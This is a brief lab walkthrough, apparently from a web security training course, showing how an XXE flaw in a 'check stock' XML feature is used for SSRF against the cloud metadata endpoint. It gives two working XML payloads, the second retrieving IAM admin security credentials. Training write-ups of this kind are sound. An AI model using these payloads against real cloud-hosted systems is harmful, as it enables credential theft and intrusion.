Exploiting XXE to perform SSRF attacks

Exploitation

the lab has a "check stock" feature that parses XML input and returns unexpected values

send to repeater

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

so it reveals the directory latest -> let's now make request to http://169.254.169.254/latest

and it keeps revealing directories so each time a directory revealed make an http request to it using xxe vulnerability until you find the last diretory where the API KEY exist

doing this we will find that the api key exist on http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara

PreviousExploiting XXE using external entities to retrieve files NextBlind XXE with out-of-band interaction

Last updated 1 year ago

Was this helpful?